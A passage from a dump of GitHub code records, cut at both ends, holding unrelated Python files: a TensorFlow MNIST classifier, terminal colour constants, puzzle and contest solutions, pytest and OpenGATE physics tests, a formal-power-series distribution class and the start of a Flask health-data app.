width=55, height=25, relief=tk.FLAT) \r\n labelframe0.config(height=1, width=windowWidth)\r\n self.textbox.grid(padx=25, pady=27, row=0, column=0, columnspan=4)\r\n labelframe0.grid(row=2, column=0, columnspan=4)\r\n\r\n startButton.grid(row=3, column=0, columnspan=4)\r\n\r\n #parent.config(menu=menubar)\r\n parent.configure(background=bgColor)\r\n parent.resizable(width=False, height=False)\r\n parent.geometry('{}x{}'.format(windowWidth, windowHeight))\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n root = tk.Tk()\r\n FileCopier(root)\r\n root.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"albertg0/file-organizer","sub_path":"file-organizer.py","file_name":"file-organizer.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26088578285","text":"from tensorflow.examples.tutorials.mnist import input_data\r\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\r\n\r\nimport tensorflow as tf\r\nsess = tf.InteractiveSession()\r\n\r\n\r\ndef variable_summaries(name,var):\r\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\r\n with tf.name_scope(name):\r\n mean = tf.reduce_mean(var)\r\n tf.summary.scalar('mean', mean)\r\n with tf.name_scope('stddev'):\r\n stddev = 
tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\r\n            tf.summary.scalar('stddev', stddev)\r\n        tf.summary.scalar('max', tf.reduce_max(var))\r\n        tf.summary.scalar('min', tf.reduce_min(var))\r\n        tf.summary.histogram('histogram', var)\r\n\r\ndef weight_variable(shape):\r\n    initial = tf.truncated_normal(shape, stddev=0.1)\r\n    return tf.Variable(initial)\r\n\r\ndef bias_variable(shape):\r\n    initial = tf.constant(0.1, shape=shape)\r\n    return tf.Variable(initial)\r\n\r\ndef conv2d(x, W):\r\n    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\r\n\r\ndef max_pool_2x2(x):\r\n    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\r\n                          strides=[1, 2, 2, 1], padding='SAME')\r\n\r\nx = tf.placeholder(tf.float32, shape=[None, 784])\r\ny_ = tf.placeholder(tf.float32, shape=[None, 10])\r\n\r\nwith tf.name_scope('input_reshape'):\r\n    image_shaped_input = tf.reshape(x, [-1, 28, 28, 1])\r\n    tf.summary.image('input', image_shaped_input, 10)\r\n\r\nW_conv1 = weight_variable([5, 5, 1, 32])\r\nb_conv1 = bias_variable([32])\r\nvariable_summaries('W_conv1',W_conv1)\r\nvariable_summaries('b_conv1',b_conv1)\r\n\r\nx_image = tf.reshape(x, [-1,28,28,1])\r\n\r\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\r\nh_pool1 = max_pool_2x2(h_conv1)\r\n\r\nW_conv2 = weight_variable([5, 5, 32, 64])\r\nb_conv2 = bias_variable([64])\r\nvariable_summaries('W_conv2',W_conv2)\r\nvariable_summaries('b_conv2',b_conv2)\r\n\r\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\r\nh_pool2 = max_pool_2x2(h_conv2)\r\n\r\nW_fc1 = weight_variable([7 * 7 * 64, 1024])\r\nb_fc1 = bias_variable([1024])\r\nvariable_summaries('W_fc1',W_fc1)\r\nvariable_summaries('b_fc1',b_fc1)\r\nh_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\r\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\r\n\r\nkeep_prob = tf.placeholder(tf.float32)\r\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\r\n\r\nW_fc2 = weight_variable([1024, 10])\r\nb_fc2 = bias_variable([10])\r\nvariable_summaries('W_fc2',W_fc2)\r\nvariable_summaries('b_fc2',b_fc2)\r\ny_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\r\n\r\ncross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y_conv, y_))\r\ntf.summary.scalar('Cross-entropy',cross_entropy)\r\ntrain_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\r\ncorrect_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\nsess.run(tf.global_variables_initializer())\r\ntf.summary.scalar('Accuracy',accuracy)\r\nmerged = tf.summary.merge_all()\r\ntrain=tf.summary.FileWriter('./logs',sess.graph)\r\nfor i in range(20000):\r\n    batch = mnist.train.next_batch(50)\r\n    if i%100 == 0:\r\n        train_accuracy = accuracy.eval(feed_dict={x:batch[0], y_: batch[1], keep_prob: 1.0})\r\n        print(\"step %d, training accuracy %g%%\"%(i, 100*train_accuracy))\r\n        summary = sess.run(merged, feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})\r\n        train.add_summary(summary,i)\r\n    train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\r\n\r\nprint(\"test accuracy %g%%\"%(100*accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0})))","repo_name":"kmbae13/testing_codes","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11943326191","text":"#! 
/usr/bin/env python3\n\n# Default settings\nATTR_OFF = \"\\033[0m\"\nDEFAULT = \"\\033[99m\"\nBOLD = \"\\033[1m\"\nUNDERLINE = \"\\033[4m\"\n\n# Colours\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nYELLOW = \"\\033[93m\"\nBLUE = \"\\033[94m\"\nPINK = \"\\033[95m\"\nCYAN = \"\\033[96m\"\nWHITE = \"\\033[97m\"\n\n# Lighter colours\nLIGHT_RED = \"\\033[31m\"\nLIGHT_GREEN = \"\\033[32m\"\nBROWN = \"\\033[33m\"\nLIGHT_BLUE = \"\\033[34m\"\nPALE_CYAN = \"\\033[36m\"\nGREY = \"\\033[37m\"\n\n# Background colours\nHIGHLIGHT_WHITE_ON_BLACK = \"\\033[7m\"\nHIGHLIGHT_RED = \"\\033[101m\"\nHIGHLIGHT_GREEN = \"\\033[102m\"\nHIGHLIGHT_YELLOW = \"\\033[103m\"\nHIGHLIGHT_BLUE = \"\\033[104m\"\nHIGHLIGHT_PINK = \"\\033[105m\"\nHIGHLIGHT_CYAN = \"\\033[106m\"\nHIGHLIGHT_WHITE = \"\\033[107m\"\n\ndef cprint(colour, *string):\n print(colour, *string, ATTR_OFF, sep=\"\")","repo_name":"zst123/code_xtremeapps_2017-setup","sub_path":"setup_sensorup/colours.py","file_name":"colours.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34500549914","text":"with open(\"7.txt\") as f:\n cont = f.read().split(\",\")\n\ncont = [int(i) for i in cont]\n\nminimumFuel = 10000000\n\nfor i in range(min(cont),max(cont)):\n fuelUsed = sum([abs(i-x) for x in cont])\n minimumFuel = min(minimumFuel,fuelUsed)\n\n print(i,minimumFuel,fuelUsed)","repo_name":"Sebbben/Public","sub_path":"AdventOfCode/2021/7-1.py","file_name":"7-1.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29233831197","text":"import pytest\nfrom smb.common.testing_utils import dt\n\nfrom maps_adv.geosmb.doorman.server.lib.enums import CallEvent, OrderEvent, SegmentType\n\npytestmark = [\n pytest.mark.asyncio,\n pytest.mark.freeze_time(\"2020-01-01 00:00:01\", tick=True),\n]\n\n\nasync def test_segments_as_no_order_clients_without_events(factory, dm):\n await factory.create_empty_client()\n await factory.create_empty_client()\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"current_size\"] == 2\n\n\nasync def test_segments_as_no_order_clients_without_order_events(factory, dm):\n client_id = await factory.create_empty_client()\n await factory.create_call_event(client_id, event_type=CallEvent.INITIATED)\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"current_size\"] == 1\n\n\n@pytest.mark.parametrize(\"event_type\", OrderEvent)\n@pytest.mark.parametrize(\n \"event_ts\", (dt(\"2020-01-01 00:00:00\"), dt(\"2018-01-01 00:00:00\"))\n)\nasync def test_skips_client_with_order_events(factory, dm, event_type, event_ts):\n client_id = await factory.create_empty_client()\n await factory.create_order_event(\n client_id=client_id, event_type=event_type, event_timestamp=event_ts\n )\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"current_size\"] == 0\n\n\nasync def test_skips_client_with_other_biz_id(factory, dm):\n await factory.create_client(biz_id=999)\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"current_size\"] == 0\n\n\nasync def test_returns_previous_segment_size(factory, dm):\n # Was in segment, but left it\n client_id_1 = await factory.create_empty_client(created_at=dt(\"2019-09-10\"))\n # Was in segment and still there\n await factory.create_empty_client(created_at=dt(\"2019-09-10\"))\n\n await factory.create_order_event(\n 
client_id=client_id_1,\n event_type=OrderEvent.CREATED,\n event_timestamp=dt(\"2019-12-20\"),\n )\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"previous_size\"] == 2\n\n\nasync def test_skips_clients_created_later_for_previous(factory, dm):\n client_id_1 = await factory.create_empty_client(created_at=dt(\"2019-12-10\"))\n await factory.create_empty_client(created_at=dt(\"2019-12-10\"))\n\n await factory.create_order_event(\n client_id=client_id_1,\n event_type=OrderEvent.CREATED,\n event_timestamp=dt(\"2019-12-20\"),\n )\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"previous_size\"] == 0\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/data_managers/list_segments/test_no_orders_segment.py","file_name":"test_no_orders_segment.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42290445683","text":"thres = 1000000000000000000\n\n#log(b)\ndef power(a,b):\n result = 1\n while b>0:\n if b%2==1:\n result = result * a\n if result>thres:\n return -1\n\n a = a*a\n b = b//2\n \n return result\n\n\n#log2(n)*log2(n)\ndef bin_search():\n low = 2\n high = last\n\n while low<high:\n mid = (low+high)//2\n\n temp = power(mid,n-1)\n if temp>last or temp==-1:\n high = mid-1\n else:\n low=mid+1\n \n return low,high\n\n\n#O(n)*log(n)\ndef calculate(num):\n res = 0\n for i in range(n):\n temp = abs(a[i]-power(num,i))\n res+=temp\n return res\n\n\nn = int(input())\na = list(map(int,input().split()))#O(n)\na.sort()\n\nlast = a[-1]\n\n#log2(n)\nfirst,second = bin_search()\n\n\n#O(4n) - max\nresult = thres\nfor i in range(second-1,first+2):\n temp = calculate(i)\n result = min(result,temp)\n\nprint(result)\n\n\n\n\n\n","repo_name":"Shovon588/Programming","sub_path":"Codeforces with Python/1397B. Power Sequence.py","file_name":"1397B. 
Power Sequence.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"11638213012","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport opengate as gate\nfrom opengate.tests import utility\nfrom opengate.userhooks import check_production_cuts\nfrom test013_phys_lists_helpers import (\n create_pl_sim,\n)\n\nif __name__ == \"__main__\":\n paths = utility.get_default_test_paths(__file__, \"gate_test013_phys_lists\")\n\n # create simulation\n sim = create_pl_sim()\n\n # keep only ion sources\n sim.source_manager.user_info_sources.pop(\"gamma\")\n\n # change physics\n sim.physics_manager.physics_list_name = \"G4EmStandardPhysics_option4\"\n sim.physics_manager.enable_decay = True\n # cuts = p.production_cuts\n mm = gate.g4_units.mm\n sim.physics_manager.global_production_cuts.gamma = 1 * mm\n sim.physics_manager.global_production_cuts.electron = 0.1 * mm\n sim.physics_manager.global_production_cuts.positron = 1 * mm\n sim.physics_manager.global_production_cuts.proton = 1 * mm\n\n reg = sim.physics_manager.add_region(\"reg\")\n reg.production_cuts.gamma = 1 * mm\n reg.production_cuts.electron = 0.01 * mm\n reg.production_cuts.positron = 1 * mm\n reg.production_cuts.proton = 1 * mm\n reg.associate_volume(\"b1\")\n\n # em parameters\n # phys_em_parameters(p)\n\n print(\"Phys list cuts:\")\n print(sim.physics_manager.dump_production_cuts())\n print(\"Volume tree:\")\n print(sim.volume_manager.dump_volume_tree())\n\n # start simulation\n sim.g4_verbose = False\n # sim.apply_g4_command(\"/tracking/verbose 1\")\n sim.user_fct_after_init = check_production_cuts\n sim.run()\n\n # Gate mac/main_3.mac\n stats = sim.output.get_actor(\"Stats\")\n stats_ref = utility.read_stat_file(paths.gate_output / \"stat_3.txt\")\n is_ok = utility.assert_stats(stats, stats_ref, tolerance=0.1)\n\n utility.test_ok(is_ok)\n","repo_name":"OpenGATE/opengate","sub_path":"opengate/tests/src/test013_phys_lists_3_wip.py","file_name":"test013_phys_lists_3_wip.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"3"} +{"seq_id":"32219911428","text":"from __future__ import annotations\n\nfrom typing import (FrozenSet, Generator, Iterator, List, Set, Tuple, Type,\n Union)\n\nimport pygin # type: ignore\nfrom probably.pgcl import Binop, BinopExpr, Expr, FunctionCallExpr, VarExpr\nfrom sympy import nan, sympify\n\nfrom prodigy.distribution.distribution import (CommonDistributionsFactory,\n Distribution, DistributionParam,\n MarginalType, State)\n\n\nclass FPS(Distribution):\n \"\"\"\n This class models a probability distribution in terms of a formal power series.\n These formal powerseries are itself provided by `prodigy` a python binding to GiNaC,\n something similar to a computer algebra system implemented in C++.\n \"\"\"\n def __init__(self,\n expression: str,\n *variables: str | VarExpr,\n finite: bool | None = None):\n self._variables = set(str(var) for var in variables if str(var) != \"\")\n self._parameters = set()\n\n for var in pygin.find_symbols(expression):\n if var not in self._variables:\n if len(variables) > 0:\n self._parameters.add(var)\n else:\n self._variables.add(var)\n self._dist = pygin.Dist(expression, list(self._parameters))\n\n self._finite = finite if finite is not None else self._dist.is_polynomial(\n self._variables) == pygin.troolean.true\n\n @classmethod\n def from_dist(cls,\n dist: pygin.Dist,\n variables: 
Set[str],\n parameters: Set[str],\n finite: bool | None = None):\n result = cls(\"0\")\n result._dist = dist\n result._variables = variables\n result._parameters = parameters\n result._finite = finite if finite is not None else dist.is_polynomial(\n variables) == pygin.troolean.true\n return result\n\n @staticmethod\n def factory() -> Type[ProdigyPGF]:\n return ProdigyPGF\n\n def __add__(self, other) -> FPS:\n if isinstance(other, (str, int)):\n return FPS.from_dist(\n self._dist + pygin.Dist(\n str(other),\n list(\n set(pygin.find_symbols(str(other))) -\n self._variables)), self._variables, self._parameters)\n elif isinstance(other, FPS):\n return FPS.from_dist(self._dist + other._dist,\n self._variables | other._variables,\n self._parameters | other._parameters)\n else:\n raise NotImplementedError(\n f\"Addition of {self._dist} and {other} not supported.\")\n\n def __sub__(self, other) -> FPS:\n if isinstance(other, (str, int)):\n return FPS.from_dist(\n self._dist - pygin.Dist(\n str(other),\n list(\n set(pygin.find_symbols(str(other))) -\n self._variables)), self._variables, self._parameters)\n elif isinstance(other, FPS):\n return FPS.from_dist(self._dist - other._dist,\n self._variables | other._variables,\n self._parameters | other._parameters)\n else:\n raise NotImplementedError(\n f\"Subtraction of {self._dist} and {other} not supported.\")\n\n def __mul__(self, other) -> FPS:\n if isinstance(other, (str, int)):\n return FPS.from_dist(\n self._dist * pygin.Dist(\n str(other),\n list(\n set(pygin.find_symbols(str(other))) -\n self._variables)), self._variables, self._parameters)\n elif isinstance(other, FPS):\n return FPS.from_dist(self._dist * other._dist,\n self._variables | other._variables,\n self._parameters | other._parameters)\n else:\n raise NotImplementedError(\n f\"Multiplication of {type(self._dist)} and {type(other)} not supported.\"\n )\n\n def __truediv__(self, other) -> FPS:\n if isinstance(other, str):\n other = FPS(other)\n if isinstance(other, FPS):\n return FPS.from_dist(self._dist * pygin.Dist(f\"1/({str(other)})\"),\n self._variables | other._variables,\n self._parameters | other._parameters)\n raise NotImplementedError(\n f\"Division of {type(self._dist)} and {type(other)} not supported.\")\n\n def __eq__(self, other) -> bool:\n if isinstance(other, str):\n other = FPS(other)\n if isinstance(other, FPS):\n if not self._variables == other._variables:\n return False\n if not self._parameters == other._parameters:\n return False\n return self._dist == other._dist\n else:\n return False\n\n def __le__(self, other) -> bool:\n raise NotImplementedError(__name__)\n\n def __str__(self) -> str:\n return str(self._dist)\n\n def __repr__(self):\n return self._dist.__repr__()\n\n def __iter__(self) -> Iterator[Tuple[str, State]]:\n if not self._finite:\n if len(self._variables) == 1:\n variable = list(self._variables)[0]\n it = self._dist.coefficient_iterator(variable)\n i = 0\n while True:\n yield str(it.next()), State({variable: i})\n i += 1\n else:\n # TODO this is just a placeholder until we have proper multivariate iteration\n variables = list(self.get_variables())\n\n def n_tuples(n):\n \"\"\"Generates all `n`-tuples of the natural numbers\"\"\"\n if n < 1:\n raise ValueError(\"n is too small\")\n if n == 1:\n num = 0\n while True:\n yield [num]\n num += 1\n else:\n index = 0\n gen = n_tuples(n - 1)\n vals = []\n while True:\n # This is absolutely unreadable, so just another reason to delete this asap\n while len(vals) < index + 1:\n # pylint: 
disable=stop-iteration-return\n vals.append(next(gen))\n # pylint: enable=stop-iteration-return\n for i in range(index, -1, -1):\n yield [i] + vals[index - i]\n index += 1\n\n for vals in n_tuples(len(variables)):\n s = f'{variables[0]}={vals[0]}'\n for i in range(1, len(variables)):\n s += f' & {variables[i]}={vals[i]}'\n mass = str(self.get_probability_of(s))\n if mass != '0':\n yield mass, State(dict(zip(variables, vals)))\n else:\n terms = self._dist.get_terms(self._variables)\n for prob, vals in terms:\n yield prob, State(vals)\n\n def copy(self, deep: bool = True) -> Distribution:\n return FPS.from_dist(self._dist, self._variables, self._parameters,\n self._finite)\n\n def get_probability_mass(self) -> Union[Expr, str]:\n return self._dist.mass(self._variables & set(self._dist.get_symbols()))\n\n def get_expected_value_of(self, expression: Union[Expr, str]) -> str:\n return self._dist.E(str(expression))\n\n def normalize(self) -> FPS:\n return FPS(self._dist.normalize(), *self._variables)\n\n def get_variables(self) -> Set[str]:\n return self._variables\n\n def get_parameters(self) -> Set[str]:\n return self._parameters\n\n def _find_symbols(self, expr: str) -> Set[str]:\n return set(pygin.find_symbols(expr))\n\n def get_symbols(self) -> Set[str]:\n return set(self._dist.get_symbols())\n\n @staticmethod\n def evaluate(expression: str, state: State) -> int:\n return pygin.evaluate(expression, state.valuations)\n\n def _exhaustive_search(self, condition: Expr) -> Distribution:\n res = pygin.Dist('0')\n for prob, state in self:\n if self.evaluate_condition(condition, state):\n res += pygin.Dist(f\"{prob} * {state.to_monomial()}\")\n return FPS.from_dist(res,\n self._variables,\n self._parameters,\n finite=True)\n\n def _filter_constant_condition(self, condition: Expr) -> FPS:\n # Normalize the conditional to variables on the lhs from the relation symbol.\n if isinstance(condition.rhs, VarExpr):\n switch_comparison = {\n Binop.EQ: Binop.EQ,\n Binop.LEQ: Binop.GEQ,\n Binop.LT: Binop.GT,\n Binop.GEQ: Binop.LEQ,\n Binop.GT: Binop.LT\n }\n return self._filter_constant_condition(\n BinopExpr(operator=switch_comparison[condition.operator],\n lhs=condition.rhs,\n rhs=condition.lhs))\n\n # is normalized conditional\n if isinstance(condition.lhs, VarExpr):\n if condition.operator == Binop.EQ:\n return FPS.from_dist(\n self._dist.filterEq(str(condition.lhs),\n str(condition.rhs)), self._variables,\n self._parameters)\n elif condition.operator == Binop.LT:\n return FPS.from_dist(\n self._dist.filterLess(str(condition.lhs),\n str(condition.rhs)), self._variables,\n self._parameters)\n elif condition.operator == Binop.LEQ:\n return FPS.from_dist(\n self._dist.filterLeq(str(condition.lhs),\n str(condition.rhs)), self._variables,\n self._parameters)\n elif condition.operator == Binop.GT:\n return FPS.from_dist(\n self._dist.filterGreater(str(condition.lhs),\n str(condition.rhs)),\n self._variables, self._parameters)\n elif condition.operator == Binop.GEQ:\n return FPS.from_dist(\n self._dist.filterGeq(str(condition.lhs),\n str(condition.rhs)), self._variables,\n self._parameters)\n\n raise ValueError(\"Parameter is not a constant condition\")\n\n def _arithmetic_progression(self, variable: str,\n modulus: str) -> List[FPS]:\n \"\"\"\n Creates a list of subdistributions where at list index i, the `variable` is congruent i modulo `modulus`.\n \"\"\"\n return [\n FPS.from_dist(dist, self._variables, self._parameters)\n for dist in self._dist.arithmetic_progression(variable, modulus)\n ]\n\n def 
is_zero_dist(self) -> bool:\n res = self._dist.is_zero()\n if res == pygin.troolean.false:\n return False\n elif res == pygin.troolean.true:\n return True\n else:\n raise ValueError('Cannot determine whether this FPS is zero')\n\n def is_finite(self) -> bool:\n return self._finite\n\n def old_update(self, expression: Expr) -> FPS:\n return FPS.from_dist(\n self._dist.update(str(expression.lhs), str(expression.rhs)),\n self._variables, self._parameters, self._finite)\n\n def get_fresh_variable(\n self, exclude: Set[str] | FrozenSet[str] = frozenset()) -> str:\n res: str = pygin.get_fresh_variable()\n while res in exclude:\n res = pygin.get_fresh_variable()\n return res\n\n def _update_var(self, updated_var: str, assign_var: str | int) -> FPS:\n return FPS.from_dist(\n self._dist.update_var(updated_var, str(assign_var)),\n self._variables, self._parameters, self._finite)\n\n def _update_sum(self, temp_var: str, first_summand: str | int,\n second_summand: str | int) -> FPS:\n return FPS.from_dist(\n self._dist.update_sum(temp_var, str(first_summand),\n str(second_summand)), self._variables,\n self._parameters)\n\n def _update_product(self, temp_var: str, first_factor: str,\n second_factor: str,\n approximate: str | float | None) -> FPS:\n return FPS.from_dist(\n self._dist.update_product(temp_var, first_factor, second_factor,\n self._variables, self._finite,\n approximate), self._variables,\n self._parameters)\n\n def _update_subtraction(self, temp_var: str, sub_from: str | int,\n sub: str | int) -> Distribution:\n res = self._dist.update_subtraction(temp_var, str(sub_from), str(sub))\n\n variables = self.get_variables()\n if sub_from in variables and sub in variables and not self.is_finite():\n # TODO this should be implemented in GiNaC, which might not be possible\n test = sympify(str(res))\n for var in self._variables - {temp_var}:\n test = test.limit(sympify(var), 1)\n test = test.subs(sympify(temp_var), 0)\n if test.has(sympify(\"zoo\")) or test == nan:\n raise ValueError(\n f\"Cannot assign '{sub_from} - {sub}' to '{temp_var}' because it can be negative\"\n )\n\n return FPS.from_dist(res, self._variables, self._parameters)\n\n def _update_modulo(self, temp_var: str, left: str | int, right: str | int,\n approximate: str | float | None) -> FPS:\n return FPS.from_dist(\n self._dist.update_modulo(temp_var, str(left), str(right),\n self._variables, self._finite,\n approximate), self._variables,\n self._parameters)\n\n def _update_division(self, temp_var: str, numerator: str | int,\n denominator: str | int,\n approximate: str | float | None) -> FPS:\n return FPS.from_dist(\n self._dist.update_division(temp_var, str(numerator),\n str(denominator), approximate),\n self._variables, self._parameters)\n\n def _update_power(self, temp_var: str, base: str | int, exp: str | int,\n approximate: str | float | None) -> Distribution:\n return FPS.from_dist(\n self._dist.update_power(temp_var, base, exp, approximate),\n self._variables, self._parameters)\n\n def update_iid(self, sampling_dist: Expr, count: VarExpr,\n variable: Union[str, VarExpr]) -> FPS:\n if not isinstance(sampling_dist, FunctionCallExpr):\n result = FPS.from_dist(\n self._dist.updateIid(str(variable),\n pygin.Dist(str(sampling_dist), *self._parameters),\n str(count)), self._variables,\n self._parameters)\n return result\n\n if sampling_dist.function in {\"unif\", \"unif_d\"}:\n [start, end] = sampling_dist.params[0]\n # Note: add parameters in constructor call of pygin.Dist\n result = self._dist.updateIid(\n str(variable),\n 
pygin.Dist(\n f\"1/(({end}) - ({start}) + 1) * test^({start}) \"\n f\"* (test^(({end}) - ({start}) + 1) - 1) / (test - 1)\"),\n str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n if sampling_dist.function == \"binomial\":\n [n, p] = sampling_dist.params[0]\n # Note: add parameters in constructor call of pygin.Dist\n result = self._dist.updateIid(\n str(variable),\n pygin.Dist(f'(1 - ({p}) + ({p}) * {variable})^({n})'),\n str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n [param] = sampling_dist.params[0]\n if sampling_dist.function == \"geometric\":\n result = self._dist.updateIid(\n str(variable), pygin.geometric(str(variable), str(param)),\n str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n if sampling_dist.function == \"bernoulli\":\n symbolic_param = pygin.find_symbols(str(param))\n result = self._dist.updateIid(\n str(variable),\n pygin.Dist(f\"{param} * {variable} + (1-{param})\", symbolic_param), str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n if sampling_dist.function == \"poisson\":\n result = self._dist.updateIid(\n str(variable), pygin.Dist(f\"exp({param} * ({variable} - 1))\"),\n str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n if sampling_dist.function == 'logdist':\n result = self._dist.updateIid(\n str(variable),\n pygin.Dist(\n f'log(1 - ({param}) * {variable}) / log(1 - ({param}))'),\n str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n raise NotImplementedError(f\"Unsupported distribution: {sampling_dist}\")\n\n def marginal(self,\n *variables: Union[str, VarExpr],\n method: MarginalType = MarginalType.INCLUDE) -> FPS:\n result = self._dist\n remove_vars = {\n MarginalType.EXCLUDE: {str(var)\n for var in variables},\n MarginalType.INCLUDE:\n self._variables - {str(var)\n for var in variables}\n }\n for var in remove_vars[method]:\n result = result.update_var(str(var), \"0\")\n return FPS.from_dist(result, self._variables - remove_vars[method],\n self._parameters)\n\n def set_variables(self, *variables: str) -> FPS:\n new_variables = set(variables)\n if new_variables.intersection(self._parameters):\n raise ValueError(\n f\"Indeterminate(s) {new_variables.intersection(self._parameters)} cannot be parameters and\"\n f\" variables at the same time.\")\n self._parameters |= self._variables - new_variables\n return FPS.from_dist(self._dist, new_variables, self._parameters,\n self._finite)\n\n def set_parameters(self, *parameters: str) -> FPS:\n new_parameters = set(parameters)\n if new_parameters.intersection(self._variables):\n raise ValueError(\n f\"Indeterminate(s) {new_parameters.intersection(self._variables)} cannot be parameters and\"\n f\" variables at the same time.\")\n self._variables |= self._parameters - new_parameters\n return FPS.from_dist(self._dist, self._variables, new_parameters,\n self._finite)\n\n def approximate(\n self,\n threshold: Union[str, int]) -> Generator[Distribution, None, None]:\n raise NotImplementedError(__name__)\n\n def approximate_unilaterally(\n self, variable: str,\n probability_mass: str | float) -> Distribution:\n return FPS.from_dist(\n self._dist.approximate_unilaterally(variable,\n str(probability_mass)),\n self._variables, self._parameters)\n\n\nclass ProdigyPGF(CommonDistributionsFactory):\n @staticmethod\n def geometric(var: Union[str, VarExpr], p: DistributionParam) -> FPS:\n return FPS.from_dist(pygin.geometric(var, str(p)), {str(var)},\n 
{*pygin.find_symbols(str(p))})\n\n @staticmethod\n def uniform(var: Union[str, VarExpr], lower: DistributionParam,\n upper: DistributionParam) -> FPS:\n function = f\"1/({upper} - {lower} + 1) * ({var}^{lower}) * (({var}^({upper} - {lower} + 1) - 1)/({var} - 1))\"\n return FPS(function, str(var), finite=True)\n\n @staticmethod\n def bernoulli(var: Union[str, VarExpr], p: DistributionParam) -> FPS:\n function = f\"({p}) * {var} + 1-({p})\"\n return FPS(function, str(var), finite=True)\n\n @staticmethod\n def poisson(var: Union[str, VarExpr], lam: DistributionParam) -> FPS:\n function = f\"exp(({lam}) * ({var} - 1))\"\n return FPS(function, str(var))\n\n @staticmethod\n def log(var: Union[str, VarExpr], p: DistributionParam) -> FPS:\n function = f\"log(1-({p})*{var})/log(1-({p}))\"\n return FPS(function, str(var))\n\n @staticmethod\n def binomial(var: Union[str, VarExpr], n: DistributionParam,\n p: DistributionParam) -> FPS:\n function = f\"(({p})*{var} + (1-({p})))^({n})\"\n return FPS(function, str(var))\n\n @staticmethod\n def undefined(*variables: Union[str, VarExpr]) -> FPS:\n return FPS(\"0\", *variables, finite=True)\n\n @staticmethod\n def one(*variables: Union[str, VarExpr]) -> FPS:\n return FPS(\"1\", *variables, finite=True)\n\n @staticmethod\n def from_expr(expression: Union[str, Expr], *variables, **kwargs) -> FPS:\n return FPS(str(expression), *variables)\n\n @staticmethod\n def zero(*variables: Union[str, VarExpr]) -> FPS:\n return FPS(\"0\", *variables, finite=True)\n","repo_name":"LKlinke/Prodigy","sub_path":"prodigy/distribution/fast_generating_function.py","file_name":"fast_generating_function.py","file_ext":"py","file_size_in_byte":22084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"23790944304","text":"import json\nimport uuid\nimport os\n\nfrom cryptography.hazmat.primitives import serialization\nfrom data_processing import clean_fhir_data\nfrom encryption import chain_data_verifier_transaction, create_keys_if_empty\nfrom flask import Flask, request\nfrom flask_cors import CORS, cross_origin\nfrom node_operations import get_all_nodes, parse_node\n\napp = Flask(__name__)\ncors = CORS(app)\n\n@app.route(\"/\")\ndef hello_world(): # put application's code here\n return \"Hello Healthchain!\"\n\n\n@app.route(\"/encode-patient-data\", methods=[\"POST\"])\n@cross_origin()\ndef encode_data():\n \"\"\"\n 1. If not wallet private key, create private key\n 2. Run data extraction algorithm to get\n a. all raw data alone\n b. metadata\n 3. If private key and public key\n a. 
